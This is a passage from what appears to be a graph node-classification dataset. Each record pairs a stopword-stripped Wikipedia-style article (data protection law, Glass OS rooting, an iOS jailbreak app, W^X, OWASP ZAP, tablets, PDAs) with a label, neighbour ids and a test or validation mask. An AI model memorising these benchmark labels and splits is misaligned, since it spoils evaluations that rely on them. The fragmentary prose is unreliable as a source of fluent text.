      11676,
      414,
      2974,
      6048,
      7070,
      11171,
      10151,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      9700,
      1509,
      9189,
      7663,
      5619,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 3599,
    "label": 4,
    "text": "Data_Protection_Act,_2012:data protection act 2012 data protection act 2012 act legislation enacted parliament republic ghana protect privacy personal data individuals regulates process personal information acquired kept used disclosed data controllers data processors requiring compliance certain data protection principles non compliance provisions act may attract either civil liability criminal sanctions depending nature infraction act also establishes data protection commission mandated ensure compliance provisions well maintain data protection register act first introduced ghana parliament 2010 subsequently withdrawn minister communications haruna iddrisu revised parliament passed bill 2012 received presidential assent may 10 2012 notice act gazetted 18 may 2012 accordance section 99 act came effect 16 october 2012 act made 99 sections arranged various headings follows key terms act defined interpretation section section 96 unless context otherwise requires section 96 provides following definitions notable terms “ data controller ” means person either alone jointly persons common persons statutory duty determines purposes manner personal data processed processed “ data processor ” relation personal data means person employee data controller processes data behalf data controller “ data subject ” means individual subject personal data “ foreign data subject ” means data subject information regulated laws foreign jurisdiction sent ghana foreign jurisdiction wholly processing “ personal data ” means data individual identified data b data information possession likely come possession data controller “ processing ” means operation activity set operations automatic means concerns data personal data collection organisation adaptation alteration information data b retrieval consultation use information data c disclosure information data transmission dissemination means available alignment combination blocking erasure destruction information data “ recipient ” means person data disclosed including employee agent data controller data processor data disclosed course processing data data controller include person disclosure made respect particular inquiry pursuant enactment “ special purposes ” means one following purpose journalism b purpose public interest c artistic purposes literary purposes act applicable data originates externally merely transits ghana however protected act section 45 4 act applies ghanaian government purpose government department treated data controller section 91 act provides 8 principles data processors take account processing data order protect privacy individuals principles similar oecd guidelines data protection directive european union data protection principles enumerated section 17 follows accountability principle data protection seen generally fundamental principle compliance requires data controller accountable compliance measures give effect data protection principles act requires person processes personal data ensure data processed without infringing rights data subject processed lawful reasonable manner section 18 1 data processed involves foreign data subject data controller processor must ensure personal data processed according data protection laws originating jurisdiction section 18 2 data processing lawful conditions justify processing present act minimality provision requires personal data processed purpose processed necessary relevant excessive section 19 prior consent data subject also required personal data processed section 20 requirement however subject exceptions instance purpose personal data processed necessary purpose contract data subject party authorised required law protect legitimate interest data subject necessary proper performance statutory duty necessary pursue legitimate interest data controller third party data supplied section 20 1 consent also required processing special personal data section 37 2 b data subject also object processing personal data section 20 2 data processor required stop processing data upon objection section 20 3 terms retention records act prohibits retention personal data period longer necessary achieve purpose collection unless retention required law reasonably necessary lawful purpose related function activity required contractual purposes data subject consented retention section 24 1 retention requirement however applicable personal data kept historical statistical research purposes section 24 2 except records must adequately protected access used unauthorized purposes section 24 3 person uses record personal data make decision data subject data must retained period required law code conduct law code conduct exists period afford data subject opportunity request access record upon expiration retention period personal data must however deleted destroyed manner prevents reconstruction intelligible form record personal data must de-identified sections 24 4 5 6 data subject may also request record personal data data subject held data controller destroyed deleted data controller longer authorisation retain data section 33 1 b act requires data controller collects personal data specific purpose explicitly defined lawful related functions activity person section 22 data controller collects data also required take necessary steps ensure data subject aware purpose data collected section 23 act requires data controller holds personal data collected connection specific purpose processing data must compatible purpose personal data initially obtained section 25 1 circumstances processing meets compatibility requirement include data subjects consents processing information data public domain processing necessary purposes fighting crime legislation concerns protection tax revenue collection conduct court proceedings protection national security public health life health data subject another person section 25 3 section 26 act data controller processes personal data must ensure data complete accurate date misleading regard purpose data collected processed openness principle ensures individuals know participate enforcing rights data protection regime section 27 1 makes mandatory data controller intends process personal data register data protection commission data controller intends collect data must also ensure data subject aware nature data collected persons responsible collection purpose collection well whether supply data mandatory discretionary among things section 27 2 data collected third party act requires data subject informed data collected soon practicable afterwards section 27 3 act provides circumstances notification requirement exempt include necessary avoid compromising law enforcement protect national security relates preparation conduct legal proceedings.section 27 4 also although mandatory data controller appoint data protection supervisor would responsible monitoring compliance act section 58 1 2 data protection supervisor may employee section 58 1 must meet qualification criteria set data protection commission section 58 7 act data controller duty prevent loss damage unauthorized destruction personal data well unlawful access unauthorized processing personal data data controller must therefore adopt appropriate reasonable technical organizational means take necessary steps ensure security personal data possession control section 28 1 data controller also required take reasonable measures identify forestall reasonably foreseeable risks ensure safeguards put place effectively implemented updated continually section 28 2 data controller must also observe generally accepted industry specific best practices securing data section 28 3 well ensure data processors comply security measures section 30 data processor domiciled ghana data controller must ensure data processor complies relevant laws country section 30 4 act also requires data controller soon reasonably practicable notify data protection commission data subject security breaches system take steps ensure integrity system restored section 31 data subject subject proving data subject ’ identity request data controller confirm data controller holds data subject ’ personal data describe nature personal data held identity third party previously access data section 32 1 request must however made reasonable manner within reasonable time paying prescribed fees form generally understandable section 32 2 data subject also request data controller correct delete personal data data subject held data controller inaccurate irrelevant excessive date incomplete misleading section 33 1 upon receipt request data controller must either comply request provide data subject credible evidence support data section 33 2 section 96 special personal data means personal data consists information relates race colour ethnic tribal origin data subject b political opinion data subject c religious beliefs beliefs similar nature data subject physical medical mental health mental condition dna data subject e sexual orientation data subject f commission alleged commission offence individual g proceedings offence committed alleged committed individual disposal proceedings sentence court proceedings act prohibits processing data relates children parental control religious philosophical beliefs ethnic origin race trade union membership political opinions health sexual life criminal behaviour individual section 37 1 special personal data may however processed necessary data subject given consent processing section 37 2 processing personal data necessary exercise right fulfil obligation conferred imposed law employer section 37 3 special personal data relating data subjects may also processed necessary protection vital interest data subject impossible data subject give consent data controller reasonably expected obtain consent consent data subject unreasonably withheld section 37 4 processing special personal data presumed necessary required purpose legal proceedings legal advice medical purposes undertaken health professional subject duty confidentiality patient health professional section 37 6 prohibition processing special personal data relating religious philosophical beliefs apply processing carried religious organisation data subject member institution founded upon religious philosophical principles respect persons associated institution necessary achieve aims institution section 38 1 act data subject right personal data corrected section 33 access personal data section 35 prevent processing personal data causes likely cause unwarranted damage distress section 39 prevent processing personal data purposes direct marketing section 40 require data controller take decision would significantly affect solely processing automatic means section 41 exempt manual data section 42 compensated data controller ’ failure comply provisions act upon proof damages section 43 inaccurate data rectified section 44 act establishes data protection commission two main objects functions dpc section 3 dpc governed 11-member board appointed president ghana act provides certain specific institutional representation section 4 board members allowed hold office period exceeding three years appointed two terms section 5 1 allowances board members approved minister responsible communications consultation minister responsible finance section 9 board officially sworn 1 november 2012 currently chaired prof. justice samuel kofi date-bah retired justice supreme court ghana dpc officially launched 18 november 2014 act also mandates president appoint executive director section 11 shall responsible day-to-day administration dpc well implementation decisions board section 12 mrs. teki akuetteh falconer current executive-director act sources dpc funds include money approved parliament donations grants money accrues dpc performance functions money minister responsible finance approves section 14 dpc also granted power serve enforcement notices data controllers requiring refrain contravening data protection principles section 75 enforcement notice may cancelled varied either dpc motion upon application recipient notice section 76 act provides establishment data protection register maintained dpc data controllers must compulsorily register section 46 applications registration data controller made writing act provides certain particulars business name address applicant description personal data collected description purpose processing personal data section 47 1 knowingly supplying false information amounts offence punishable fine imprisonment section 47 2 also separate entry register must made separate purpose data controller wishes process data section 47 3 dpc right refuse grant application particulars provided inclusion entry register insufficient data controller able provide appropriate safeguards protection privacy data subject opinion dpc applicant merit grant registration section 47 1 upon refusing registration application dpc required inform applicant reasons refusal event applicant may apply high court judicial review decision section 47 2 registration data controller subject renewal every two years section 50 dpc also power cancel registration good cause section 52 offence process personal data without registering section 56 act also provides access public register upon payment prescribed fee section 54 act provides several exemptions different purposes follows processing personal data exempt provisions act relates national security section 60 relation crime taxation section 61 disclosure personal data relating health education social work section 61 prohibited unless required law provisions act also applicable protection members public specified loss malpractice provisions section 63 processing personal data prohibited unless processing undertaken purpose literary artistic material data controller reasonably believes publication would public interest compliance provision incompatible special purposes section 64 provisions non-disclosure apply disclosure required law court section 66 act apply data processed purpose managing individual ’ domestic affairs section 67 data protection principles apply personal data consists references given confidence purposes education appointment office provision service data subject section 68 subject information provisions act apply personal data likely prejudice combat effectiveness armed forces section 69 processed assess suitability person judicial appointment confer national honour section 70 consists information respect claim professional privilege confidentiality section 74 personal data exempt provisions act relates examinations marks processed data controller relation individual ’ results section 72 consists information recorded candidate academic purposes section 73 act prohibits purchase personal data knowing reckless disclosure personal data contravention provision amounts offence section 88 act also makes sale offering sell advertising sale personal data offence section 89 minister responsible communications may consultation dpc make regulations effective implementation act",
    "neighbors": [
      2818,
      3880,
      1930,
      9260,
      5133,
      9901,
      1169,
      3858,
      10002,
      6455,
      1368
    ],
    "mask": "Test"
  },
  {
    "node_id": 3600,
    "label": 2,
    "text": "Glass_OS:glass os glass os google xe version google android operating system designed google glass glass-omap tag used referring modified android code found inside kernel repository following list shows main changes happened update release detailed release notes visit support website initial release xe5 updates included xe6 updates include glass updates automatically air glass check google servers periodically updates update available glass download device install update happens condition active battery charging reliable wi-fi connection root access easily obtained using following script using rooted bootloader adb reboot bootloader enter fastboot mode takes 10-15 seconds fastboot devices verify device fastboot see serial fastboot oem unlock unlocking erases data prompted run command twice sure fastboot flash boot boot.img gain root shell access rooted bootloader fastboot reboot reboot device adb root start adb root adb shell access shell root extract desired factory system image package flash glass back factory specifications run following script boot system images found google glass developer website adb reboot bootloader enter fastboot mode fastboot devices verify device fastboot see serial fastboot flash boot boot.img flash partitions factory images fastboot flash system system.img fastboot flash recovery recovery.img fastboot erase cache optional erase cache userdata partitition fastboot erase userdata fastboot oem lock optional want re-lock bootloader kernel source code easily attainable google repository using following script mkdir path-for-kernel-source cd path-for-kernel-source git clone https //android.googlesource.com/kernel/omap.git build kernel source code first download gcc toolchain repository git clone https //android.googlesource.com/platform/prebuilt export path= path-for-kernel-source /prebuilt/linux-x86/toolchain/arm-eabi-4.4.3/bin path build kernel using commands export arch=arm export subarch=arm export cross_compile=arm-eabi- cd path-for-kernel-source /omap git checkout glass-omap-xrr02 choose suitable release make notle_defconfig make",
    "neighbors": [
      8719,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      5363,
      3836,
      5892,
      7428,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      7483,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      7595,
      2001,
      479,
      6632,
      1516,
      5100,
      9712,
      11252,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 3601,
    "label": 9,
    "text": "Qualification_principle:qualification principle programming language theory qualification principle states semantically meaningful syntactic class may admit local definitions words possible include block syntactic class provided phrases class specify kind computation common examples principle includes",
    "neighbors": [
      5585,
      7386,
      2045,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 3602,
    "label": 4,
    "text": "PP_Jailbreak:pp jailbreak pp jailbreak also commonly known pp pp25 app pp25 jailbreak term describing free chinese app containing tools capable jailbreaking ios 8 devices except apple tv eligible products include ipod touch iphone ipad app developed chinese ios hacking community known pp assistant first released january 19 2015 tools pp jailbreak application help users bypass device restrictions order obtain root access operating system users able install applications customizations typically available app store ios pp jailbreak available chinese notable application able jailbreak ios 8.4 mac ios 8.4 windows pp jailbreak gives users access software unavailable ios app store using cydia ios application digital distribution platform although pp jailbreak initially incompatible cydia includes recommended resources cydia software tools openssh ios user removes pp jailbreak device update device latest ios version due firmware updates apple furthermore device loaded latest ios version go back previous ios version initial release pp jailbreak tool included support ios 9.3 team suspected imminent firmware update apple would fix vulnerabilities used tool pp assistant also known m949mm term ios community developed jailbreaking tools pp jailbreak said fake taig ios jailbreak 25pp pc pp helper freeware software created manage android ios devices including ios 12 using app easily install games create backups view files device automatically clean temp files created software etc also option install apps without using appstore user interface pp helper app chinese language difficult user interface quite easy navigate",
    "neighbors": [
      1346,
      9732,
      6023,
      9063,
      10631,
      6539,
      7983,
      700,
      4957
    ],
    "mask": "None"
  },
  {
    "node_id": 3603,
    "label": 2,
    "text": "W^X:w^x w^x write xor execute spoken w xor x security feature operating systems virtual machines memory protection policy whereby every page process kernel address space may either writable executable without protection program write data cpu instructions area memory intended data arrange run executable instructions dangerous writer memory malicious w^x relatively simple processors support fine-grained page permissions sun sparc sparc64 amd amd64 hewlett-packard pa-risc hp originally digital equipment corporation alpha arm early intel 64 processors lacked nx bit required w^x appeared later chips processors limited features intel i386 w^x requires using cs code segment limit line sand point address space execution permitted data located allowed executable pages placed linker changes generally required separate code trampolines code needed linker library runtime functions data w^x first implemented openbsd 3.3 released may 2003 2004 microsoft introduced similar feature called dep data execution prevention windows xp similar features available operating systems including pax exec shield patches linux netbsd implementation pax although w^x dep protected userland programs existence 2012 microsoft extended windows kernel x86 arm architectures late 2014 early 2015 w^x added openbsd kernel amd64 architecture early 2016 w^x fully implemented netbsd amd64 kernel partially i386 kernel since 2016 firefox 46 virtual machine javascript also implements w^x policy",
    "neighbors": [
      8066,
      3462,
      5384,
      6664,
      6797,
      8725,
      7702,
      1820,
      8609,
      6829,
      7983,
      5040,
      823,
      9665,
      1474,
      3142,
      4423,
      1103,
      5840,
      4562,
      3413,
      5078,
      5598,
      10851,
      4071,
      8551,
      5356,
      9964,
      1776,
      8944,
      5363,
      2804,
      1399,
      7039
    ],
    "mask": "Test"
  },
  {
    "node_id": 3604,
    "label": 4,
    "text": "OWASP_ZAP:owasp zap owasp zap short zed attack proxy open-source web application security scanner intended used new application security well professional penetration testers one active open web application security project owasp projects given flagship status used proxy server allows user manipulate traffic passes including traffic using https also run daemon mode controlled via rest api zap added thoughtworks technology radar may 2015 trial ring built features include intercepting proxy server traditional ajax web crawlers automated scanner passive scanner forced browsing fuzzer websocket support scripting languages plug-n-hack support plugin-based architecture online ‘ marketplace ’ allows new updated features added gui control panel easy use",
    "neighbors": [
      7526,
      8585,
      1802,
      9834,
      10412,
      461,
      3310,
      5677,
      7983,
      113,
      9293,
      9780,
      4725,
      10492,
      823,
      3290,
      7228,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3605,
    "label": 2,
    "text": "Surface_2:surface 2 surface 2 surface-series windows rt hybrid tablet computer created microsoft unveiled september 23 2013 released october 22 2013 successor original surface january 2015 microsoft longer manufactures surface 2 provide security updates device 2023 pre-orders surface 2 opened september 24 2013 device released october 22 2013 value-added services surface 2 includes 200 gb additional onedrive storage 2 years 1 year free skype calls landlines access skype wifi hotspots january 2015 stock sold microsoft store online microsoft confirmed discontinued production surface 2 surface 2 nokia lumia 2520 remaining windows rt device market discontinued well week later made magnesium alloy toughened glass outer shell surface 2 maintains similar design predecessor bare metal silver color scheme black bezel surface 2 also slightly thinner lighter previous model surface 2 uses 1.7 ghz quad-core nvidia tegra 4 chipset 2 gb ram microsoft claimed new chipset improvements internal hardware made surface 2 three four times faster original surface 10 hours battery life playing videos unlike original surface used 1366 x 768 display surface 2 uses 1080p display surface pro 2 display claimed almost 50 better color previous version well lowest reflectivity among competing tablets device also includes full-size usb 3.0 port 32 64 gb internal storage microsd slot surface 2 ships windows rt 8.1 4g lte model surface 2 launched march 18 2014 comes 64 gb model microsoft cellular partner surface 2 4g lte comes access app pre-installed device actually ships unlocked 4g models also come gps assisted gps glonass surface 2 includes microsoft calls silver-magnesium color scratch resistant compared original surface surface 2 ships windows rt 8.1 office 2013 rt unlike original surface launched office 2013 rt beta later received final release version bundled apps include mail calendar people contacts bing apps including food drink health fitness weather travel stocks sports apps later renamed msn apps like predecessor desktop apps already bundled os forbidden run surface 2 device unlike successor surface 3 classified 2-in-1 pc notable change surface surface 2 hiding desktop tile start screen updated versions surface cover accessories available surface 2 touch cover 2 type cover 2 slightly thinner previous versions include dynamic backlight system touch cover 2 1,092 sensors compared 80 original touch cover keyswitch length type cover 2 reduced 2.5 mm 1.5 mm new power cover accessory also available add 30 wh additional battery capacity device accompanying touch cover 2 type cover 2 wireless adapter allows connected 30 feet away via bluetooth updated kickstand tilted 55-degree angle alongside original 22-degree angle unveiling microsoft also showcased music cover variation touch cover serves dj mixer playback controls 16-button sampler three sliders mainstream public release announced distributed musicians surface remix project campaign initial reviews surface 2 mixed reviewers generally positive device hardware improvements compared original surface however surface 2 often criticized lack support traditional windows desktop programs low number high quality apps available windows store financial report microsoft second quarter 2014 revenue doubled 400 million first quarter 893 million however microsoft still lost 39 million since development costs equaled around 932 million skeptics acknowledged growth despite still losing money surface brand surface 2 reported overheating issues microsoft delivered update try fix issue",
    "neighbors": [
      4356,
      11524,
      5384,
      6797,
      782,
      1935,
      10900,
      9498,
      11549,
      7970,
      1832,
      6827,
      7983,
      3890,
      8757,
      10303,
      4289,
      9033,
      2635,
      10957,
      4816,
      4051,
      11221,
      11605,
      11103,
      10338,
      3304,
      617,
      8681,
      9964,
      1776,
      1400
    ],
    "mask": "Test"
  },
  {
    "node_id": 3606,
    "label": 3,
    "text": "Palm_m500_series:palm m500 series palm m500 series handheld personal digital assistants consisted three devices palm m500 palm m505 palm m515 series follow-up popular palm v series similar though slightly shorter footprint form factor like palm v series metal cases although m500 plastic back plate 160x160 resolution screen distinguishing features common series sd/mmc expansion slot faster processor new faster usb sync interface new software functionality new vibrating alarms new indicator light mechanical fastener vs. hot-glue case construction later models introduced improved version color display memory palm m500 series palm pilot pdas released march 6 2001 based poll conducted palm computing formerly division 3com determined palm v definitive look ideal pda palm m500 models based palm v form factor slim case slight curvature left right edges power button lit green docking cradle important message available input included four programmable buttons two scrolling buttons touch-sensitive 2-1/4 x 3 screen including 2-1/4 x 3/4 input area palm devices data input stylus pen using graffiti method m500 series models featured secure digital sd multi media card mmc expansion slot sd/mmc slot allowed additional memory upgrades devices well expandable platform add-on devices m500 series also first palm devices incorporate new universal connector universal palm t3 abandoned allowed additional add-on devices common hotsync cradles m500 entry-level model m500 series 8 mb on-board memory featured monochrome screen features common m500 series devices released march 6 2001 part original rollout series operating system palm os version 4.0 upgrade 4.1 processor 33 mhz motorola dragonball vz memory 8 mb display 160x160 pixel b w display 4-bit 16 shades gray size 4.49 x 3.02 x .46 11.41 x 7.67 x 1.17 cm weight 4.162 oz 118 g battery internal lithium polymer rechargeable 2hr recharge time empty ac adapter input 120 v 60 hz 10 w output 5.0 vdc 1.0 irda port expansion slot compatible sd mmc cards m505 time series rollout top-of-the-line model palm devices also 8 mb on-board memory addition standard m500 series features also featured 16-bit color frontlit screen released march 6 2001 part original rollout series operating system palm os version 4.0 upgrade 4.1 processor 33 mhz motorola dragonball vz memory 8 mb 4mb flash 8mb ram display 160x160 pixel color display 65,000+ colors size 4.48 x 3.03 x 0.50 11.38 x 7.70 x 1.27 cm weight 4.8 oz 136g battery internal lithium polymer rechargeable 2hr recharge time empty ac adapter input 120vac 60 hz 11w output 5.0vdc 1.0a irda port expansion slot compatible sd mmc cards march 4 2002 palm released m515 based consumer reviews surveys conducted company m515 developed improved version replacement m505 notable enhancements include 16 mb on-board memory enhanced backlighting system much criticism m505 even backlight dim difficult read environments m515 added additional setting allowing backlight put high considerably brighter predecessor operating system palm os version 4.1 processor 33 mhz motorola dragonball vz memory 16 mb ram 4 mb flash display 160x160 pixel color display 65,000+ colors size 4.48 x 3.03 x 0.50 11.38 x 7.70 x 1.27 cm weight 4.8 oz 139g battery internal lithium polymer rechargeable ac adapter input 120vac 60 hz 11w output 5.0vdc 1.0a irda port expansion slot compatible sd mmc cards",
    "neighbors": [
      2308,
      10500,
      6790,
      3606,
      8982,
      6178,
      5164,
      9013,
      694,
      5318,
      3017,
      11337,
      9037,
      2258,
      1621,
      4832,
      4449,
      2285,
      2420,
      8952,
      9598
    ],
    "mask": "Test"
  },
  {
    "node_id": 3607,
    "label": 3,
    "text": "Advanced_Dungeons_&_Dragons:_Heroes_of_the_Lance:advanced dungeons amp dragons heroes lance advanced dungeons dragons heroes lance video game released january 1988 various home computer systems consoles game based first dragonlance campaign module dungeons dragons fantasy role-playing game dragons despair first dragonlance novel dragons autumn twilight heroes lance focuses journey eight heroes ruined city xak tsaroth must face ancient dragon khisanth retrieve relic disks mishakal heroes lance side-scrolling action game game uses actual dungeons dragons statistics statistics characters exactly rule books eight heroes dragonlance novels series must assembled quest one visible screen time one on-screen hero dies next line appears heroes lance faithful representation books based departure usual role-playing video game style dungeons dragons games gameplay interface consists using one character time horizontally scrolling fighting character different types attacks spells making suited fighting different enemies merely act lives player traditional fighting games removing one main strategies role-playing games game eight heroes make party heroes lance based dragonlance novels margaret weis tracy hickman heroes lance part gold box series nickname titles silver box games nes version developed natsume heroes lance successful ssi 88,808 copies sold computers north america reviewing pre-production copy dos version heroes lance magazine g.m praised graphics excellent audio said would undoubtedly go straight top computer games charts stay several months good computer gaming world gave dos version game similarly positive review electronic gaming monthly columnist seanbaby listed nes version 2nd worst nes game 11th worst video game levi buchanan classic dungeons dragons videogame retrospective ign wrote n't plan well lose lot heroes short period time offered slight strategy angle fans largely preferred pool radiance straight rpg approach pool radiance sales triple heroes lance according gamespy game actually fairly decent side-scroller time frustrating level difficulty along fact could n't save game meant gamers gave game miss storyline game continued two subsequent video games dragons flame shadow sorcerer",
    "neighbors": [
      356,
      9166
    ],
    "mask": "Test"
  },
  {
    "node_id": 3608,
    "label": 0,
    "text": "Data-oriented_parsing:data-oriented parsing data-oriented parsing dop also data-oriented processing probabilistic model computational linguistics dop conceived remko scha 1990 aim developing performance-oriented grammar framework unlike probabilistic models dop takes account subtrees contained treebank rather restricted example 2-level subtrees like pcfgs several variants dop developed initial version developed rens bod based tree-substitution grammar recently dop combined lexical-functional grammar lfg resulting dop-lfg finds application machine translation work learning parameter estimation dop also found way machine translation",
    "neighbors": [
      10610,
      1490,
      7164,
      1890
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3609,
    "label": 4,
    "text": "ACARM-ng:acarm-ng acarm-ng alert correlation assessment reaction module next generation open source ids/ips system acarm-ng alert correlation software significantly facilitate analyses traffic computer networks responsible collection correlation alerts sent network host sensors also referred nids hids respectively correlation process aims reduce total number messages need viewed system administrator possible merging similar events groups representing logical pieces malicious activity initial version acarm developed frame positif european research project 2004 2007 written java practical proof concept presented article despite poor scalability efficiency issues software proved highly useful end 2009 became obvious current design serious shortcomings poor performance first place result project discontinued later year new project nicknamed acarm-ng launched aiming replace original acarm acarm-ng bring alert correlation new dimension thank scalability plug-in-based architecture actively developed since 2009 wroclaw centre networking supercomputing part pl-grid project acarm-ng main features include acarm-ng consists 3 main elements correlation daemon wui optional database engine acarm-ng daemon designed scratch framework solution provides core system functionalities like logging alerts correlated meta-alerts passing system parts error recovery multi-threading etc.. rest package plug-ins separated following classes built-in software watchdog provides up-to-date information system status wui makes browsing correlated data easy via graphical tabular representation gathered correlated events system administrator easily see going every moment system lifetime wui daemon interoperate database daemon stores gathered data along correlation results runtime configuration wui entitled read display data notice even though data base engine required running daemon strongly recommended save data persistently rejecting use database makes impossible obtain system information via wui leads loss historical data system restarted events longer processed daemon discarded well often required limit amount incoming data example remove alerts raised periodically cron scripts order allow users adapt system input needs special preprocessor component provided allows define chain accept-if-match reject-if-match rules accept reject incoming alerts enter correlation engine acarm-ng daemon allows addition removal new plug-ins without need recompile core package makes system development testing much easier plug-in used configured main configuration file first persistency provides abstraction storage level generic interface used implement data-saving back-end long transaction mechanism provided recent stable release acarm-ng provides following persistency implementations input provides abstraction data gathering mechanism requirement implementation output alerts acarm-ng-compatible form recent stable release acarm-ng provides following input implementations filter provides abstraction correlation data update mechanism restrictions filter meta-alert though common use correlate similar alerts specially tuned api provided special case recent stable release acarm-ng provides following filter implementations trigger provides abstraction reporting reaction mechanism triggers design allowed change content data initiate response alerts typical use real-time reporting suspicious events administrators example via e-mail automatic reaction detected thread example blocking malicious host firewall recent stable release acarm-ng provides following trigger implementations trigger set independently react specific threshold correlated alerts count rule defined way daemon main preprocessor approach gives fully configurable solution allowing define arbitrary complex rules minimize false-positives especially system configured perform autonomous reaction suspicious events",
    "neighbors": [
      5472,
      3778,
      2887,
      8554,
      5677,
      7983,
      8349,
      823,
      5658,
      8539,
      5245,
      3486,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3610,
    "label": 5,
    "text": "Microsoft_Messenger_service:microsoft messenger service messenger formerly msn messenger service .net messenger service windows live messenger service instant messaging presence system developed microsoft 1999 use msn messenger software used instant messaging clients including windows 8 windows live messenger microsoft messenger mac outlook.com xbox live third-party clients also connected service communicated using microsoft notification protocol proprietary instant messaging protocol service allowed anyone microsoft account sign communicate real time people signed well april 2013 microsoft merged service skype network existing users able sign skype existing accounts access contact list part merger skype instant messaging functionality running backbone former messenger service despite multiple name changes service client software years messenger service often referred colloquially msn due history msn messenger service known msn messenger service 1999 2001 time microsoft changed name .net messenger service began offering clients longer carried msn name windows messenger client included windows xp originally intended streamlined version msn messenger free advertisements integrated windows nevertheless company continued offer upgrades msn messenger end 2005 previous versions msn messenger windows messenger superseded new program windows live messenger part microsoft launch windows live online services several years official name service remained .net messenger service indicated official network status web page though microsoft rarely used name promote service main client used access service became known windows live messenger microsoft started referring entire service windows live messenger service support documentation mid-2000s service integrate windows operating system automatically simultaneously signing network user logs windows account organizations also integrate microsoft office communications server active directory service december 2011 microsoft released xmpp interface messenger service part larger effort rebrand many windows live services microsoft began referring service simply messenger 2012 microsoft offered following instant messaging clients connected messenger service additionally third-party clients others able access messenger service microsoft messenger criticized use microsoft notification protocol provide encryption makes wiretapping personal conversations messenger possible someone intercepts communication easy unencrypted public wi-fi networks",
    "neighbors": [
      10242,
      5251,
      9732,
      5382,
      4746,
      6539,
      1036,
      6797,
      11408,
      3228,
      10271,
      2208,
      929,
      3105,
      9511,
      1962,
      3629,
      7983,
      9519,
      8758,
      1467,
      10748,
      6208,
      1218,
      1346,
      2760,
      2892,
      6993,
      4318,
      4704,
      3812,
      4068,
      6628,
      7928,
      1148,
      7551
    ],
    "mask": "Test"
  },
  {
    "node_id": 3611,
    "label": 6,
    "text": "WBFS:wbfs wbfs wii backup file system file system developed wii homebrew coder waninkoko uses waninkoko cios works creating wbfs partition sd usb device wii homebrew application may run dump wii game partition titles may launched using wii usb loader uses cios usb 2.0 load games external device although way natively load wbfs partition pc environment run wii emulator dolphin also several applications wbfs managers mac os x linux windows allow transfer iso image files wbfs formatted drive main advantage reduction file size wbfs format allows wii discs filled padding data must present iso wbfs file system strip away",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      6961,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 3612,
    "label": 1,
    "text": "Biometric_Database_Law:biometric database law biometric database law israeli law knesset passed december 2009 determining fingerprints facial contours would collected israeli residents collected data would integrated onto israeli digital identity cards digital passports biometric government database israeli citizens residents would created would used biometric identification would allow management access control identification individuals assist locating individuals suspected criminal activity law enforcement officials law passed december 2009 determined law gradually applied first phase inclusion one biometric data central database would voluntary laws targets presented first section law addresses serious issues identifying fake id cards passports producing double records person identity theft caused using documentation person identity stolen examples allow misuse identification documents illegal immigration criminal economic offenses activities harm israel national security nowadays identification documents easily forged criminals often try get assistance state workers 2005 2007 interior ministry reported loss theft destruction 150,000 id cards per year submitted requests handed new identity cards many cases question loss theft destruction id cards occurred several times resident three years data israeli police indicates 52 percent individuals submitted requests new identity cards lost stolen and/or destroyed years 1995 2006 criminal record 10 percent criminal record distribution counterfeit documents employees interior ministry would authorized collect biometric identification data israeli population transfer data database would managed biometric database management authority הרשות לניהול המאגר הביומטרי data would used issue resident identification documents verification individual identity means rechecking individual biometric identification data authorized officials police officer employee shin bet employee mossad etc. biometric database would stored separately government older existing identity database although selected government officials would capable linking two databases retrieve additional data opponents law including prominent israeli scientists security experts warned existence database could damage civil liberties state security leaks could used criminals hostile individuals israeli residents",
    "neighbors": [
      2737,
      5373,
      10685,
      10207
    ],
    "mask": "None"
  },
  {
    "node_id": 3613,
    "label": 9,
    "text": "Compiled_language:compiled language compiled language programming language whose implementations typically compilers translators generate machine code source code interpreters step-by-step executors source code pre-runtime translation takes place term somewhat vague principle language implemented compiler interpreter combination solutions also common compiler translate source code intermediate form often called p-code bytecode passed interpreter executes programs compiled native code compile time tend faster translated run time due overhead translation process newer technologies just-in-time compilation general improvements translation process starting narrow gap though mixed solutions using bytecode tend toward intermediate efficiency low-level programming languages typically compiled especially efficiency main concern rather cross-platform support languages one-to-one correspondences programmed code hardware operations performed machine code making easier programmers control use central processing unit cpu memory fine detail effort always possible write compilers even traditionally interpreted languages example common lisp compiled java bytecode interpreted java virtual machine c code compiled native machine code directly native code programming languages support multiple compiling targets give control developers choose either execution speed cross-platform compatibility languages commonly considered compiled",
    "neighbors": [
      512,
      9345,
      2691,
      6403,
      9224,
      2062,
      8082,
      5395,
      5651,
      5527,
      5783,
      9626,
      1435,
